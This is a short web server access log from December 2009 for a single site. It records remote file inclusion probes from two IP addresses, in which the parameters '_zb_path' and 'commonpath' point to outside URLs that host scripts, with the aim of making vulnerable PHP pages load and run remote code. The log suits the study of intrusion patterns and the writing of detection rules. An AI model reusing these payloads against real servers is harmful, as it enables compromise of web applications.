93.190.41.101 - - [13/Dec/2009:10:33:07 -0800] "GET //?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 14948 "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:10:33:07 -0800] "GET /logs///?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:10:33:36 -0800] "GET /common/db.php?commonpath=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:10:33:36 -0800] "GET /logs/access_080609.log%20%20//common/db.php?commonpath=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:10:33:36 -0800] "GET /logs//common/db.php?commonpath=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:10:33:42 -0800] "GET /logs/access_090502.log%20%20//common/db.php?commonpath=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
